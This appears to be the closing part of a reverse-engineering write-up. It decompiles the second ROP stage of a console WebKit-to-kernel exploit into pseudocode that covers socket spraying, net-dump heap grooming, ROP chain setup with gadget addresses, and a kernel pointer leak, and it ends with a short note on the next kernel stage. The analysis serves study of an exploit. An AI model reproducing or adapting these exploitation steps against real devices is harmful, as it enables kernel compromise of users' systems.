0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);
// sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);
// sceNetSocket("tst", AF_INET, 0x7, 0);
0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);
// Setup "mhm" ROP
0x00(x_stack + 0x00008708) = 0x008DD9B5
0x00(x_stack + 0x0000870C) = 0x000085C4
0x00(x_stack + 0x00008710) = 0x10007300
0x00(x_stack + 0x00008714) = 0x00000000
0x00(x_stack + 0x00008718) = 0x00000000
0x00(x_stack + 0x0000871C) = 0x00009F90
0x00(x_stack + 0x00008720) = 0x00000000
0x00(x_stack + 0x00008724) = 0x000FCDBB
0x00(x_stack + 0x00008728) = 0x00008810
0x00(x_stack + 0x0000872C) = 0x000059A9
0x00(x_stack + 0x00008730) = 0x00000000
0x00(x_stack + 0x00008734) = 0x00000519
/*
"mhm" ROP
// Issue an IOCtl to "tst" FD
int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);
// Store IOCtl result
0x00(x_stack + 0x00008810) = ioctl_res;
// Deadlock
sceWebkit_519();
*/
// Copy "mhm" ROP chain into "mhm" thread's stack
memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);
// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;
// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}
// sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);
// Create several net dumps
// sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);
// Destroy some dumps
sceNetDumpDestroy(x_stack + 0x000085F4);
sceNetDumpDestroy(x_stack + 0x000085FC);
sceNetDumpDestroy(x_stack + 0x00008604);
sceNetDumpDestroy(x_stack + 0x0000860C);
sceNetDumpDestroy(x_stack + 0x00008614);
sceNetDumpDestroy(x_stack + 0x000085E8);
// Create more net dumps
sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000);
sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000);
sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000);
sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);
// Start "mhm" thread
// Thread arguments are loaded into R1 and the gadget
// at the thread's entrypoint then loads register values
// from it, overwritting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
// Delay thread
sceKernelDelayThread(1500000);
// Close no longer needed sockets
sceNetSyscallClose(x_stack + 0x00008470);
sceNetSyscallClose(x_stack + 0x00008478);
sceNetSyscallClose(x_stack + 0x00008480);
sceNetSyscallClose(x_stack + 0x00008488);
sceNetSyscallClose(x_stack + 0x00008490);
sceNetSyscallClose(x_stack + 0x00008498);
sceNetSyscallClose(x_stack + 0x000084A0);
sceNetSyscallClose(x_stack + 0x000084A8);
sceNetSyscallClose(x_stack + 0x000084B0);
sceNetSyscallClose(x_stack + 0x000084B8);
sceNetSyscallClose(x_stack + 0x000084C0);
sceNetSyscallClose(x_stack + 0x000084C8);
sceNetSyscallClose(x_stack + 0x000084D0);
sceNetSyscallClose(x_stack + 0x000084D8);
sceNetSyscallClose(x_stack + 0x000084E0);
sceNetSyscallClose(x_stack + 0x000084E8);
sceNetSyscallClose(x_stack + 0x000084F0);
sceNetSyscallClose(x_stack + 0x000084F8);
sceNetSyscallClose(x_stack + 0x00008500);
sceNetSyscallClose(x_stack + 0x00008508);
sceNetSyscallClose(x_stack + 0x00008510);
sceNetSyscallClose(x_stack + 0x00008518);
sceNetSyscallClose(x_stack + 0x00008520);
sceNetSyscallClose(x_stack + 0x00008528);
sceNetSyscallClose(x_stack + 0x00008530);
sceNetSyscallClose(x_stack + 0x00008538);
sceNetSyscallClose(x_stack + 0x00008540);
sceNetSyscallClose(x_stack + 0x00008548);
sceNetSyscallClose(x_stack + 0x00008550);
sceNetSyscallClose(x_stack + 0x00008558);
sceNetSyscallClose(x_stack + 0x00008560);
sceNetSyscallClose(x_stack + 0x00008568);
sceNetSyscallClose(x_stack + 0x00008570);
sceNetSyscallClose(x_stack + 0x00008578);
sceNetSyscallClose(x_stack + 0x00008580);
sceNetSyscallClose(x_stack + 0x00008588);
sceNetSyscallClose(x_stack + 0x00008590);
sceNetSyscallClose(x_stack + 0x00008598);
sceNetSyscallClose(x_stack + 0x000085A0);
sceNetSyscallClose(x_stack + 0x000085A8);
sceNetSyscallClose(x_stack + 0x000085C4);
// Break into kernel space
sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);
// Destroy another dump
sceNetDumpDestroy(x_stack + 0x000085DC);
// Delay for a while
sceKernelDelayThread(1000000);
// Calculate a SceWebkit pointer using the ioctl
// from "mhm" thread (kernel space?)
r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;
// Unknown
sceWebkit_123();
sceWebkit_CF481();
// Destroy specific dumps (constant IDs)
sceNetDumpDestroy(0x00001770);
sceNetDumpDestroy(0x00001771);
sceNetDumpDestroy(0x00001772);
sceNetDumpDestroy(0x00001773);
sceNetDumpDestroy(0x00001774);
sceNetDumpDestroy(0x00001775);
sceNetDumpDestroy(0x00001776);
sceNetDumpDestroy(0x00001777);
sceNetDumpDestroy(0x00001778);
sceNetDumpDestroy(0x00001779);
sceNetDumpDestroy(0x0000177A);
sceNetDumpDestroy(0x0000177B);
sceNetDumpDestroy(0x0000177C);
sceNetDumpDestroy(0x0000177D);
sceNetDumpDestroy(0x0000177E);
sceNetDumpDestroy(0x0000177F);
sceNetDumpDestroy(0x00001780);
sceNetDumpDestroy(0x00001781);
sceNetDumpDestroy(0x00001782);
sceNetDumpDestroy(0x00001783);
sceNetDumpDestroy(0x00001784);
sceNetDumpDestroy(0x00001785);
sceNetDumpDestroy(0x00001786);
sceNetDumpDestroy(0x00001787);
sceNetDumpDestroy(0x00001788);
sceNetDumpDestroy(0x00001789);
sceNetDumpDestroy(0x0000178A);
sceNetDumpDestroy(0x0000178B);
sceNetDumpDestroy(0x0000178C);
sceNetDumpDestroy(0x0000178D);
sceNetDumpDestroy(0x0000178E);
sceNetDumpDestroy(0x0000178F);
sceNetDumpDestroy(0x00001790);
// Deadlock
sceWebkit_519(0x00000000);The second ROP payload prepares the stage for a kernel attack. After it's done, another ROP chain should be starting on the kernel side. This chain relies on kernel pointers that were leaked during the second payload's execution and is built beforehand. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.
To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the data region.
To be continued...
~ H.
